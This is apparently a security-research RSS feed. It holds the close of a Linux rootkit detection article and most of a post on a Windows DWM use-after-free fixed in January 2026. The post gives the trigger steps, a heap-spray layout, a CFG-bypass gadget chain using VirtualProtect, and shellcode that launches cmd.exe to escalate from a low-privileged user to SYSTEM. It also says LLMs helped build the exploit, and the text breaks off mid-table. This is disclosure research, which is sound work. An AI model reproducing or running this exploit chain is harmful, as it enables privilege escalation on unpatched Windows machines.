<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image3.png" alt="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm" title="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm." /></p>
<p>This is a technique that we have added coverage for via both detection rules and protection artifacts:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/cross-platform/defense_evasion_timestomp_touch.toml">Timestomping using Touch Command</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_timestomping_detected_via_touch.toml">Timestomping Detected via Touch</a></li>
</ul>
<p>Although there are always more techniques we did not discuss in this research, we are confident that this research will help deepen the understanding of the Linux rootkit landscape and its detection engineering.</p>
<h2>Rootkit prevention techniques</h2>
<p>Preventing Linux rootkits requires a layered defense strategy that combines kernel and userland hardening, strict access control, and continuous monitoring. Mandatory access control frameworks, such as SELinux and AppArmor, limit process behavior and userland persistence opportunities. Meanwhile, kernel hardening techniques, including Lockdown Mode, KASLR, SMEP/SMAP, and tools like LKRG, mitigate the risk of kernel-level compromise. Restricting kernel module usage by disabling dynamic loading or enforcing module signing further reduces common vectors for rootkit deployment.</p>
<p>Visibility into malicious behavior is enhanced through Auditd and file integrity monitoring for syscall and file activity, as well as through EDR solutions that identify and prevent suspicious runtime behaviors. Security is further strengthened by minimizing process privileges through <code>seccomp-bpf</code>, Linux capabilities, and the landlock LSM, thereby restricting syscall access and filesystem interactions.</p>
<p>Timely kernel and software updates, supported by live patching when necessary, close known vulnerabilities before they are exploited. Additionally, filesystem and device configurations should be hardened by remounting sensitive filesystems with restrictive flags and disabling access to kernel memory interfaces, such as <code>/dev/mem</code> and <code>/proc/kallsyms</code>.</p>
<p>No single control can prevent rootkits outright. A layered defense, combining configuration hardening, static and dynamic detection, and forensic readiness, remains essential.</p>
<h2>Conclusion</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/linux-rootkits-1-hooked-on-linux">part one of this series</a>, we examined how Linux rootkits operate internally, exploring their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we translated that knowledge into practical detection strategies, focusing on the behavioral signals and runtime telemetry that expose rootkit activity.</p>
<p>While Windows malware continues to dominate the focus of commercial security vendors and threat research communities, Linux remains comparatively under-researched, despite powering the majority of the world’s cloud infrastructure, high-performance computing environments, and internet services.</p>
<p>Our analysis highlights that Linux rootkits are evolving. The increasing adoption of technologies such as eBPF, <code>io_uring</code>, and containerized Linux workloads introduces new attack surfaces that are not yet well understood or widely protected.</p>
<p>We encourage the security community to:</p>
<ul>
<li>Invest in Linux-focused detection engineering from both static and dynamic angles.</li>
<li>Share research findings, proofs of concept, and detection strategies openly to accelerate collective knowledge among defenders.</li>
<li>Collaborate across vendors, academia, and industry to push Linux rootkit defense toward the same maturity level achieved on Windows.</li>
</ul>
<p>Only by collectively improving visibility, detection, and response capabilities can defenders stay ahead of this stealthy and rapidly evolving threat landscape.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/linux-rootkits-2-caught-in-the-act.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Patch diff to SYSTEM]]></title>
            <link>https://www.elastic.co/kr/security-labs/patch-diff-to-system</link>
            <guid>patch-diff-to-system</guid>
            <pubDate>Fri, 06 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Leveraging LLMs and patch diffing, this research details a Use-After-Free vulnerability in Windows DWM, demonstrating a reliable exploit that achieves escalation from low-privileged user permissions to SYSTEM.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen <a href="https://www.ibm.com/think/x-force/patch-tuesday-exploit-wednesday-pwning-windows-ancillary-function-driver-winsock">proved</a> that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.</p>
<h2>The Hunt</h2>
<p>When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities, and (hopefully) develop a working exploit for it. Top on the <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan">target list</a> were any vulnerabilities already known to be exploited in the wild. January patches included an in-the-wild information leak <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-20805">vulnerability</a> in Desktop Window Manager (DWM), which caught my eye. It also included a second DWM vulnerability which could lead to local privilege escalation. Historically, DWM has been a <a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">popular target</a> for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.</p>
<p>After training Ghidra on the files and extracting BSim vectors for every function, it becomes quite easy to highlight the differences between them. Not to mention, many Microsoft-patched vulnerabilities come alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.</p>
<pre><code>======================================================================
BSim PATCH DIFF REPORT
======================================================================
File 1: dwmcore_vuln.dll
File 2: dwmcore_patched.dll 
======================================================================

----------------------------------------------------------------------------------------------------
TOP 10 MOST MODIFIED FUNCTIONS
----------------------------------------------------------------------------------------------------
  dwmcore_vuln.dll                      dwmcore_patched.dll                        Sim  Jaccard
----------------------------------------------------------------------------------------------------
  FUN_1802e7842                         FUN_1802e7842                           0.1191   0.0632
  FUN_1802e92d6                         FUN_1802e92d6                           0.1470   0.0722
  FUN_1802e5faa                         FUN_1802e5faa                           0.1741   0.0769
  ~CDelegatedInkCanvas                  ~CDelegatedInkCanvas                    0.7556   0.6047
  GetBufferedOutputTransformed          GetBufferedOutputTransformed            0.7628   0.6154
  FrameStarted                          FrameStarted                            0.7833   0.6429
  ~CSynchronousSuperWetInk              ~CSynchronousSuperWetInk                0.8018   0.6667
  FUN_1802f5aa2                         FUN_1802f5aa2                           0.9127   0.8393
  FUN_1802f57d2                         FUN_1802f5d72                           0.9127   0.8393
======================================================================
</code></pre>
<p>From here, I have to say that the time to build a functional exploit was painfully slower than I would have hoped. I spent many long nights and weekends poking and prodding the model along. A lot of this came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail and get RCE from low privilege into DWM and to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. However, with these techniques (and some other tooling) in hand and newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to functional exploit dropped from 3 weeks to a matter of hours.</p>
<h2>The Bug</h2>
<p>The vulnerability is a Use-After-Free in <code>CSynchronousSuperWetInk::~CSynchronousSuperWetInk</code>. The destructor conditionally removes the object from <code>CSuperWetInkManager</code> based on the return value of <code>IsSuperWetCompatible()</code>.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    this-&gt;vtable = &amp;_vftable_;
    bool bVar2 = IsSuperWetCompatible(this);
    if (bVar2) {
        CSuperWetInkManager::RemoveSource(this-&gt;composition-&gt;superWetInkManager, this);
    }
    // ... cleanup continues
}
</code></pre>
<p><em>The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.</em></p>
<h3>IsSuperWetCompatible Condition</h3>
<pre><code class="language-c">bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) {
    if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp;
        this-&gt;clipEntry != NULL &amp;&amp; this-&gt;comObject != NULL) {
        return true;
    }
    return false;
}
</code></pre>
<p><em>The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.</em></p>
<p>The function returns <code>true</code> only when <code>LookupMode</code> equals 2, or <code>notifier1</code> is set, AND both <code>clipEntry</code> and <code>comObject</code> are non-null.</p>
<h3>The Bug</h3>
<p>An attacker can:</p>
<ol>
<li>Register a <code>CSynchronousSuperWetInk</code> with the manager (requires <code>LookupMode=2</code> during <code>Draw()</code>)</li>
<li>Change <code>LookupMode</code> to 0 via <code>CMD_SET_PROPERTY</code></li>
<li>Trigger destruction via <code>CMD_RELEASE_RESOURCE</code></li>
<li><code>IsSuperWetCompatible()</code> returns FALSE → <code>RemoveSource()</code> is <strong>skipped</strong></li>
<li>A dangling pointer remains in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ol>
<p>When DWM later iterates this vector (e.g., in <code>DirtyActiveInk</code>), it dereferences the freed object's vtable, leading to controlled code execution.</p>
<h3>The Fix</h3>
<p>The patch adds a feature flag (<code>Feature_1732988217</code>). When enabled, <code>RemoveSource()</code> is called <strong>unconditionally</strong>, regardless of <code>IsSuperWetCompatible()</code>. This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    *(undefined ***)this = &amp;_vftable_;
    bool bVar2 = wil::details::FeatureImpl&lt;Feature_1732988217&gt;::__private_IsEnabled(&amp;impl);
    if (!bVar2) {
        bVar2 = IsSuperWetCompatible(this);
        if (!bVar2) goto LAB_1802a9b1a;  // Skip RemoveSource only if feature disabled AND !compatible
    }
    CSuperWetInkManager::RemoveSource(..., this);
LAB_1802a9b1a:
    // ... cleanup continues
}
</code></pre>
<p><em>The fixed destructor in dwmcore.dll version 10.0.26100.7623.</em></p>
<h2>The Exploit</h2>
<p>The UAF can be triggered from a regular user-mode application via the <a href="https://learn.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal">DirectComposition API</a>. The attack requires no special privileges.</p>
<h3>Prerequisites</h3>
<ol>
<li><strong>D3D11/DXGI Infrastructure</strong>: Create a D3D11 device with BGRA support and a swap chain for a visible window.</li>
<li><strong>DirectComposition Device</strong>: Initialize via <code>DCompositionCreateDevice()</code> with the DXGI device.</li>
<li><strong>NtDComposition Syscall Access</strong>: Hook or directly call <code>NtDCompositionProcessChannelBatchBuffer</code> and <code>NtDCompositionCommitChannel</code> via <code>win32u.dll</code> to inject raw batch buffer commands.</li>
</ol>
<h3>Trigger Sequence</h3>
<h4>Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)</h4>
<p>Query <code>IDCompositionInkTrailDevice</code> from the DirectComposition device, then call <code>CreateDelegatedInkTrailForSwapChain()</code> or <code>CreateDelegatedInkTrail()</code>. This allocates a <code>CSynchronousSuperWetInk</code> object (resource type <code>0xa8</code>) in dwm.exe's heap.</p>
<h4>Step 2: Create Visual and Set LookupMode=2</h4>
<p>Inject batch buffer commands to:</p>
<ol>
<li>Create a <code>CSuperWetInkVisual</code> (type <code>0xa5</code>) with <code>CMD_CREATE_RESOURCE</code> (0x02)</li>
<li>Connect visual to ink source: <code>CMD_SET_REFERENCE</code> (0x10) with propId <code>0x34</code></li>
<li>Set <code>LookupMode=2</code> on the ink source via <code>CMD_SET_PROPERTY</code> (0x0B) with propId <code>10</code></li>
<li>Connect to composition tree: <code>CMD_SET_REFERENCE</code> to handles 1 and 2 (composition target / marshaler) with propId <code>0x34</code></li>
</ol>
<p>LookupMode=2 ensures <code>IsSuperWetCompatible()</code> returns TRUE during <code>Draw()</code>, which registers the object with <code>CSuperWetInkManager::localStrokesVector</code>.</p>
<h4>Step 3: Render Frames to Register with Manager</h4>
<p>Present multiple frames (<code>IDXGISwapChain::Present</code>) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the <code>CSynchronousSuperWetInk</code> pointer in the manager's internal vector.</p>
<h4>Step 4: Set LookupMode=0 (Bypass Removal Check)</h4>
<p>Inject <code>CMD_SET_PROPERTY</code> to change <code>LookupMode</code> to <code>0</code>. Now <code>IsSuperWetCompatible()</code> will return FALSE because:</p>
<pre><code class="language-c">if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp; ...)
</code></pre>
<p>With <code>LookupMode</code> = 0 and no notifier, the first condition fails.</p>
<h4>Step 5: Release Ink Trail (Create Dangling Pointer)</h4>
<ol>
<li>Disconnect visual references: <code>CMD_SET_REFERENCE</code> with refHandle=0 for all connections</li>
<li>Release the <code>IDCompositionDelegatedInkTrail</code> interface</li>
</ol>
<p>When the destructor <code>~CSynchronousSuperWetInk</code> runs:</p>
<ul>
<li>It calls <code>IsSuperWetCompatible()</code> which returns <strong>FALSE</strong> (LookupMode=0)</li>
<li><code>RemoveSource()</code> is <strong>SKIPPED</strong></li>
<li>The object is freed but its pointer <strong>remains</strong> in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ul>
<h4>Step 6: Trigger DirtyActiveInk (Use-After-Free)</h4>
<p>Continue presenting frames and invalidating the window. DWM's composition loop calls <code>CSuperWetInkManager::DirtyActiveInk()</code>, which iterates <code>localStrokesVector</code> and dereferences the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
</code></pre>
<h3>Crash Behavior</h3>
<p>Without a heap spray, DWM crashes when accessing freed memory:</p>
<pre><code> # Call Site
00 ntdll!KiUserExceptionDispatch
01 0x00007ffe`f23270d1
02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae
03 dwmcore!CComposition::PreRender+0x99f
04 dwmcore!CComposition::ProcessComposition+0x1d7
05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
</code></pre>
<p>If the freed memory is reclaimed by another object (e.g., <code>CInteractionTrackerScaleAnimation</code>), the crash occurs at an unexpected vtable:</p>
<pre><code>kd&gt; dps rcx
00000201`fbef65f0  00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24
</code></pre>
<p>By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at <code>vtable+0x50</code>.</p>
<h2>Heap Spray</h2>
<p>To exploit the UAF, we must reclaim the freed <code>CSynchronousSuperWetInk</code> allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.</p>
<h3>Target Object Properties</h3>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Object</td>
<td align="left"><code>CSynchronousSuperWetInk</code></td>
</tr>
<tr>
<td align="left">Size</td>
<td align="left">0x120 (288 bytes)</td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>DefaultHeap::AllocClear</code> → <code>GetProcessHeap()</code></td>
</tr>
<tr>
<td align="left"><a href="https://learn.microsoft.com/en-us/windows/win32/memory/low-fragmentation-heap">LFH</a> Bucket</td>
<td align="left">34 (273-288 byte range)</td>
</tr>
<tr>
<td align="left">Slots per <a href="https://blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf">Subsegment</a></td>
<td align="left">57</td>
</tr>
</tbody>
</table>
<h3>Spray Primitive: CRegionGeometry RECT Buffer</h3>
<p>The spray uses <code>CRegionGeometry</code> resources (type <code>0x81</code>) with RECT array data:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Resource Type</td>
<td align="left"><code>0x81</code> (CRegionGeometry)</td>
</tr>
<tr>
<td align="left">Spray Size</td>
<td align="left">18 RECTs × 16 bytes = <strong>288 bytes</strong></td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>std::_Allocate&lt;16&gt;</code> → <code>HeapAlloc(GetProcessHeap(), 0, 288)</code></td>
</tr>
<tr>
<td align="left">LFH Bucket</td>
<td align="left">34, <strong>same as target</strong></td>
</tr>
<tr>
<td align="left">Content Control</td>
<td align="left">72 int32 values (18 RECTs × 4 fields)</td>
</tr>
</tbody>
</table>
<p><strong>Allocation Chain</strong>:</p>
<pre><code>dcomp.dll:   SetRectangles → ResourceSetBufferPropertyCustomWrite
win32kbase:  CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy
dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range
             → std::_Allocate&lt;16&gt; → HeapAlloc(GetProcessHeap(), 0, 288)
</code></pre>
<p>The RECT buffer is written via <code>CMD_SET_BUFFER_PROPERTY</code> (0x0F) with propId <code>5</code>:</p>
<pre><code class="language-c">struct CmdSetResourceBufferProperty {
    uint32_t cmdId;      // 0x0F
    uint32_t handle;     // Resource handle
    uint32_t propId;     // 5 for RECT array
    uint32_t dataSize;   // 288 for 18 RECTs
    // Variable-length RECT data follows (4-byte aligned)
};
</code></pre>
<h3>RECT Layout for Fake Object</h3>
<p>The 18 RECTs (288 bytes) provide full control over the reclaimed memory:</p>
<pre><code class="language-c">struct SprayRECT {
    int32_t left;    // +0x00 within RECT
    int32_t top;     // +0x04
    int32_t right;   // +0x08
    int32_t bottom;  // +0x0C
};
// Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields

// Key offsets for exploit:
// +0x00: fake vtable pointer (RECT[0].left/top)
</code></pre>
<p>Helper to write 64-bit values into adjacent RECT fields:</p>
<pre><code class="language-c">static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}
</code></pre>
<h3>Exploitation Primitive</h3>
<p>The UAF gives us a <strong>controlled vtable call with RCX pointing to our sprayed object</strong>. When <code>DirtyActiveInk</code> iterates the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
(*pcVar2)();  // call [[spray]+0x50] with RCX = spray
</code></pre>
<p><strong>Call site stack:</strong></p>
<pre><code>00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9
01 dwmcore!CComposition::PreRender+0x99f
02 dwmcore!CComposition::ProcessComposition+0x1d7
03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
04 dwmcore!CConnection::RunCompositionThread+0x142
05 KERNEL32!BaseThreadInitThunk+0x17
06 ntdll!RtlUserThreadStart+0x2c
</code></pre>
<p><strong>Register state at dispatch:</strong></p>
<ul>
<li><code>RCX</code> = pointer to sprayed object (our controlled 288 bytes)</li>
<li><code>RIP</code> = <code>[[spray]+0x50]</code> (function pointer from fake vtable)</li>
</ul>
<h3>Target Function Constraints</h3>
<p>There are initially two restrictions on what we can call:</p>
<ol>
<li>The target must be <strong>in the CFG bitmap</strong> (marked as valid call target)</li>
<li>The target must have a <strong>pointer to it</strong> (in IAT, vtable, or other readable memory)</li>
</ol>
<p>We cannot directly call arbitrary addresses; only functions that satisfy both conditions.</p>
<h3>Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect</h3>
<p>With the UAF giving us a controlled vtable call (<code>RIP = [[spray]+0x50]</code>, <code>RCX = spray</code>), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems to achieve code execution, but it required 2 successful exploit attempts, lowering the reliability. Therefore, we pivoted to a <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">known public</a> technique using two Windows system DLL gadgets: <code>__fnINSTRING</code> (user32.dll) and <code>CStdAsyncStubBuffer2_Disconnect</code> (combase.dll).</p>
<h4>Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak</h4>
<p>The Windows kernel communicates back to user mode through the <code>KernelCallbackTable</code> (KCT), a function pointer table stored in the PEB at offset <code>+0x58</code>. Each entry points to a <code>__fn*</code> handler in <code>user32.dll</code>. These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.</p>
<p>We point the fake vtable at <code>&amp;KCT[fnINSTRING_index] - 0x50</code>. When DirtyActiveInk dereferences <code>[[spray]+0x50]</code>, it reads the KCT entry and dispatches to <code>__fnINSTRING</code>:</p>
<pre><code>[[spray]+0x50]
  = [KCT_entry_addr - 0x50 + 0x50]
  = [KCT_entry_addr]
  = &amp;__fnINSTRING
</code></pre>
<p>What makes this useful is what <code>__fnINSTRING</code> does internally. It treats its argument (our spray buffer) as a <code>_CAPTUREBUF</code> structure and calls <code>FixupCallbackPointers</code> before dispatching the inner function. <code>FixupCallbackPointers</code> reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:</p>
<pre><code class="language-c">// Simplified FixupCallbackPointers logic:
void FixupCallbackPointers(_CAPTUREBUF* buf) {
    if (buf-&gt;guard != 0) return;  // already fixed up - skip
    int32_t* fixups = (int32_t*)((char*)buf + buf-&gt;fixupTableOffset);
    for (int i = 0; i &lt; buf-&gt;fixupCount; i++) {
        int32_t* target = (int32_t*)((char*)buf + fixups[i]);
        *(uint64_t*)target += (uint64_t)buf;  // relative → absolute
    }
}
</code></pre>
<p>This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and <code>FixupCallbackPointers</code> patches them to absolute pointers at runtime using the buffer's own address. After fixup, <code>__fnINSTRING</code> dispatches the inner function pointer at <code>+0x48</code> with the arguments at <code>+0x28</code> (RCX), <code>+0x30</code> (EDX), <code>+0x38</code> (R8), and <code>+0x50</code> (R9).</p>
<p>We set the inner function to <code>CStdAsyncStubBuffer2_Disconnect</code>.</p>
<h4>Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls</h4>
<p><code>CStdAsyncStubBuffer2_Disconnect</code> is exported from <code>combase.dll</code>, making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:</p>
<pre><code>; CStdAsyncStubBuffer2_Disconnect (simplified)
MOV  RBX, RCX             ; save this
MOV  RCX, [RCX-8]         ; load [this-8] -&gt; fake_obj_1
TEST RCX, RCX
JZ   skip1
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x20]      ; vtable[4]
CALL guard_dispatch_icall  ; CALL #1: [[this-8]+0x20]  ← VirtualProtect

skip1:
XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; DEFUSE: read [this+0x10], zero it
TEST RCX, RCX
JZ   skip2
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x10]      ; vtable[2]
CALL guard_dispatch_icall  ; CALL #2: [[[this+0x10]]+0x10]  ← shellcode

skip2:
ADD  RSP, 0x20
POP  RBX
RET
</code></pre>
<p><code>RDX</code>, <code>R8</code>, and <code>R9</code> are <strong>preserved through both calls</strong>, arriving untouched from <code>__fnINSTRING</code>'s argument setup. This gives us full control over the first three arguments to both vtable calls.</p>
<h4>Vtable Call #1: VirtualProtect → RWX</h4>
<p>We construct a self-referential fake object at <code>+0xC8</code> in the spray buffer: <code>[+0xC8]</code> points to itself (after fixup), so dereferencing <code>[RCX] → [RCX+0x20]</code> reads <code>VirtualProtect</code>'s address from <code>+0xE8</code>. The arguments (preserved from <code>__fnINSTRING</code> dispatch) are:</p>
<table>
<thead>
<tr>
<th align="left">Register</th>
<th align="left">Value</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">RCX</td>
<td align="left">base+0xC8 (fake_obj_1)</td>
<td align="left">lpAddress (start of spray buffer region)</td>
</tr>
<tr>
<td align="left">RDX</td>
<td align="left">0x1000</td>
<td align="left">dwSize</td>
</tr>
<tr>
<td align="left">R8</td>
<td align="left">0x40</td>
<td align="left">flNewProtect (<code>PAGE_EXECUTE_READWRITE</code>)</td>
</tr>
<tr>
<td align="left">R9</td>
<td align="left">base+0xC0</td>
<td align="left">lpflOldProtect (output slot in spray buffer)</td>
</tr>
</tbody>
</table>
<p>After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.</p>
<h4>Vtable Call #2: Inline Shellcode</h4>
<p>After VirtualProtect returns, Disconnect loads <code>[this+0x10]</code> into RCX for the second vtable dispatch:</p>
<pre><code>XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; RCX = [base+0x90] = base+0xA0 (fake_obj_2)
TEST RCX, RCX
JZ   skip2                 ; non-zero → take the call
MOV  RAX, [RCX]            ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2)
MOV  RAX, [RAX+0x10]       ; RAX = [base+0xB8] = base+0xD0 (shellcode!)
CALL guard_dispatch_icall   ; call base+0xD0
</code></pre>
<p>The pointer chain resolves step by step:</p>
<ol>
<li><code>[this+0x10]</code> = <code>[base+0x90]</code> = <code>base+0xA0</code> (fake_obj_2)</li>
<li><code>[RCX]</code> = <code>[base+0xA0]</code> = <code>base+0xA8</code>, fake_obj_2's vtable pointer (after fixup)</li>
<li><code>[RAX+0x10]</code> = <code>[base+0xB8]</code> = <code>base+0xD0</code>, vtable_2's third entry, pointing at our shellcode</li>
</ol>
<p>The final <code>CALL guard_dispatch_icall</code> dispatches to <code>base+0xD0</code>, our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.</p>
<h5>Shellcode Layout</h5>
<p>The shellcode is split into two phases because the VirtualProtect address data sits at <code>+0xE8</code> (used as <code>vtable_1[0x20]</code> by call #1), creating a gap in the middle of our executable region:</p>
<p><strong>Phase 1 (+0xD0, 22 bytes):</strong> Saves <code>RCX</code> (base+0xA0) into <code>RBX</code> for later address arithmetic, allocates shadow space, loads <code>SW_SHOW</code> (5) into <code>RDX</code>, loads the absolute address of <code>WinExec</code> via <code>movabs RAX</code>, then jumps over the 8-byte data gap at <code>+0xE8</code>:</p>
<pre><code>mov  rbx, rcx              ; save base+0xA0 for address math
sub  rsp, 0x28             ; shadow space
push 5
pop  rdx                   ; uCmdShow = SW_SHOW
movabs rax, &lt;WinExec addr&gt; ; 10-byte immediate load
jmp  +0x0A                 ; skip over +0xE8 data → land at +0xF0
</code></pre>
<p><strong>Phase 2 (+0xF0):</strong> Calls <code>WinExec</code> with a <code>RIP</code>-relative pointer to the <code>&quot;cmd.exe\0&quot;</code> string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:</p>
<pre><code>lea  rcx, [rip+0x22]      ; rcx = &amp;&quot;cmd.exe&quot;
call rax                   ; WinExec(&quot;cmd.exe&quot;, SW_SHOW)

; Defuse: rewrite fake vtable so re-entry is harmless
lea  rax, [rbx+0x78]       ; rax = address of the ret below
mov  [rbx-0x48], rax       ; [base+0x58] = ret_gadget
lea  rax, [rbx-0x98]       ; rax = base+0x08
mov  [rbx-0xA0], rax       ; [base+0x00] = base+0x08 (new fake vtable)

; Stack fixup: skip Disconnect + __fnINSTRING return frames
add  rsp, 0xB8             ; 0x28 shadow + 0x90 to unwind past intermediate frames
xor  eax, eax              ; zero return value
ret                        ; return directly to DWM composition loop
; &quot;cmd.exe\0&quot; embedded here
</code></pre>
<p>The <code>add rsp, 0xB8</code> improves reliability. A naive <code>add rsp, 0x28</code> would return into <code>CStdAsyncStubBuffer2_Disconnect</code>, which would then return into <code>__fnINSTRING</code>, which calls <code>NtCallbackReturn</code>. This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra <code>0x90</code> to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to <code>DirtyActiveInk</code>'s caller in the DWM composition loop.</p>
<h4>Safe Re-entry: Defusing the Spray</h4>
<p>DWM's <code>DirtyActiveInk</code> may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:</p>
<ol>
<li><code>[base+0x00]</code> is overwritten to <code>base+0x08</code> (new fake vtable)</li>
<li><code>[base+0x58]</code> is overwritten to the address of a <code>ret</code> instruction</li>
</ol>
<p>On re-entry: <code>[[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret</code>. The vtable call returns immediately. <code>__fnINSTRING</code> is never re-invoked because the vtable no longer points at the KCT entry.</p>
<h3>Complete Spray Layout</h3>
<p>The full 288-byte spray buffer (18 RECTs) after <code>FixupCallbackPointers</code>:</p>
<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Content</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">+0x00</td>
<td align="left">8</td>
<td align="left">KCT_entry - 0x50</td>
<td align="left">Fake vtable → <code>__fnINSTRING</code></td>
</tr>
<tr>
<td align="left">+0x08</td>
<td align="left">4</td>
<td align="left">8</td>
<td align="left">Fixup count</td>
</tr>
<tr>
<td align="left">+0x18</td>
<td align="left">4</td>
<td align="left">0x58</td>
<td align="left">Fixup table offset</td>
</tr>
<tr>
<td align="left">+0x20</td>
<td align="left">8</td>
<td align="left">base (fixup'd)</td>
<td align="left">Guard (blocks re-fixup)</td>
</tr>
<tr>
<td align="left">+0x28</td>
<td align="left">8</td>
<td align="left">base+0x80 (fixup'd)</td>
<td align="left">RCX → Disconnect <code>this</code></td>
</tr>
<tr>
<td align="left">+0x30</td>
<td align="left">4</td>
<td align="left">0x1000</td>
<td align="left">EDX → VirtualProtect <code>dwSize</code></td>
</tr>
<tr>
<td align="left">+0x38</td>
<td align="left">8</td>
<td align="left">0x40</td>
<td align="left">R8 → PAGE_EXECUTE_READWRITE</td>
</tr>
<tr>
<td align="left">+0x48</td>
<td align="left">8</td>
<td align="left">&amp;Disconnect</td>
<td align="left">Inner function pointer</td>
</tr>
<tr>
<td align="left">+0x50</td>
<td align="left">8</td>
<td align="left">base+0xC0 (fixup'd)</td>
<td align="left">R9 → <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0x58</td>
<td align="left">32</td>
